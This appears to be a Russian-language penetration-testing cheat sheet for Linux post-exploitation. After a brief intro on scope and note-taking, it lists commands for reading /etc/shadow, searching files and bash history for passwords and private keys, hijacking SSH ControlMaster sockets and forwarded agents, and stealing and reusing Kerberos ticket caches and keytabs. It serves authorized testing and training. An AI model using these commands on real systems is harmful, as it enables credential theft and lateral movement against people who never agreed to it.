Перейти к основному содержимому

Linux

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

  1. Закрепите текущий уровень доступа и соберите контекст (ОС, сеть, домен).
  2. Минимизируйте шум: избегайте лишних действий вне scope.
  3. Документируйте команды и вывод для отчёта.
  4. Ниже — заголовки и примеры команд на английском.

Методика

User and group enumeration

sudo awk -F: '($2==""){print}' /etc/shadow

Operative System

uname -a
env

Files enumeration

Files owned by a user

find / -type f -user <user> -or -group <group> 2>/dev/null | grep -v ^/proc

Modified files

find / -type f -newermt <start date range> ! -newermt <end date range>

Accessed files

find / -type f -newerat <start date range> ! -newerat <end date range>

Disks

cat /etc/fstab

Password Enumeration

# Passwords
grep  -rnw '/' -ie "passw" --color=always 2>/dev/null
cat ~/.bash_history | grep -i passw 
# Find SSH keys
find / -type f -name id_rsa 2>/dev/null 
grep  -rnw '/' -ie "private key" --color=always 2>/dev/null

Cronjobs

cat /etc/crontab
crontabe -e

SSH

find /home/ -iname "id_rsa"
find /home/ -iname "*.key"

Control Master

Host *
        ControlPath ~/.ssh/controlmaster/%r@%h:%p
        ControlMaster auto
        ControlPersist 10m
offsec@controller:~$ ls -al ~/.ssh/controlmaster/
total 8
drwxrwxr-x 2 offsec offsec 4096 May 13 13:55 .
drwx------ 3 offsec offsec 4096 May 13 13:55 ..
srw------- 1 offsec offsec    0 May 13 13:55 offsec@linuxvictim:22
offsec@linuxvictim:22
ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim

SSH Agent Forwarding

ps aux | grep ssh
pstree -p <USER> | grep ssh
sshd(15228)---bash(15229)---su(15241)---bash(15242)
sshd(16380)---bash(16381)
cat /proc/16381/environ
root@controller:~# SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l
ss -ntp  | grep 22 | grep -i ssh

Kerberos

cat /etc/krb5.conf
find /tmp/ -type f -iname "*krb5cc_*" 2>/dev/null
sudo cp /tmp/krb5cc_* /tmp/krb5cc_minenow
sudo chown <ATTACKER_USER>:<ATTACKER_USER> /tmp/krb5cc_minenow
kdestroy
export KRB5CCNAME=/tmp/krb5cc_minenow
klist
find / -type f -iname "*.keytab" 2>/dev/null
ls /etc/krb5.*
python3 KeyTabExtract/keytabextract.py krb5.keytab 
klist
ticketConverter.py adminWebSvc.kirbi adminWebSvc.ccache
export KRB5CCNAME=/var/www/html/OSEP/Challenge6/adminWebSvc.ccache